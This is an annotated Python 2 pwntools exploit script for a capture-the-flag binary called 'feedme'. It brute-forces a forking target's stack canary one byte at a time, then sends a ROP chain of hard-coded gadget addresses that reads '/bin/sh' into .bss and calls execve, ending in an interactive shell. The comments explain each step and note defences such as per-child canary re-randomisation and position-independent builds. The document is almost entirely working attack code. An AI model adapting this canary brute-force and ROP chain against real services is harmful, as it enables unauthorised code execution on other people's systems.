exploit.py
from pwn import *

# Exploit script for the "feedme" CTF binary, written for Python 2 and a
# legacy pwntools (str payloads, `print` statements); a Python 3 port would
# need bytes everywhere the script builds or compares strings.
p = process("./feedme")
e = ELF("./feedme")

# --- Stage 1: recover the 4-byte stack canary one byte at a time ----------
# The target is driven by a single length byte followed by that many bytes
# (see the paired send() calls). Each guess refills the 0x20-byte buffer,
# replays the canary bytes already recovered and appends one candidate byte.
# A wrong candidate trips the compiler's canary check and the target prints
# "stack smashing detected"; a candidate whose response lacks that message
# is accepted as the next byte. This only works if the canary is identical
# on every attempt, presumably because the target forks a child per request
# -- assumption to confirm. The defensive counterpart is re-randomising the
# canary per child (or not forking a long-lived parent at all).
canary = ""
p.recvuntil("FEED ME!\n")
for j in range(0,4):            # four bytes: 32-bit target (p32 below)
    for i in range(0,256):
        payload = "A"*0x20+canary+chr(i)
        p.send(chr(len(payload)))   # length prefix, then the data itself
        p.send(payload)
        result = p.recvuntil("FEED ME!\n")
        # NOTE(review): if no candidate is accepted, this inner loop ends
        # without extending `canary` and the later stages run with a
        # truncated value; the script does not detect that case.
        if not "stack smashing detected" in result:
            canary += chr(i)
            print canary
            break
print "Find Canary = " + canary

# --- Stage 2: ROP chain from gadgets in this specific binary --------------
# Hard-coded addresses for this build; they are only stable because the
# binary is loaded at a fixed address (no PIE) -- a position-independent
# build would invalidate all four. The variable names read as
# `pop eax; ret`, `pop ecx; pop ebx; ret`, `pop edx; ret` and `int 0x80`,
# but the script never verifies that -- check against the binary.
syscall = 0x0806fa1e
par = 0x080bb496
pcpbr = 0x0806f371
pdr = 0x0806f34a
bss = e.bss()                   # writable scratch area at a known address
binsh = "/bin/sh\x00"
payload = "A"*0x20              # fill the buffer
payload += canary               # keep the canary intact so the check passes
payload += "A"*12               # presumably the gap up to the saved return address
# First syscall (assuming the gadget names above): eax=3, ebx=0, ecx=bss,
# edx=len(binsh) -- on 32-bit Linux that is read(0, bss, 8), which pulls the
# "/bin/sh" string sent further down into .bss.
payload += p32(par)
payload += p32(0x3)
payload += p32(pcpbr)
payload += p32(bss)
payload += p32(0)
payload += p32(pdr)
payload += p32(len(binsh))
payload += p32(syscall)
# Second syscall: eax=0xb, ebx=bss, ecx=0, edx=0 -- execve(bss, 0, 0).
payload += p32(par)
payload += p32(0xb)
payload += p32(pcpbr)
payload += p32(0)
payload += p32(bss)
payload += p32(pdr)
payload += p32(0)
payload += p32(syscall)
p.send(chr(len(payload)))       # same length-prefixed framing as stage 1
p.send(payload)
sleep(0.1)                      # let the target reach the read() before the string arrives
p.send(binsh)
p.interactive()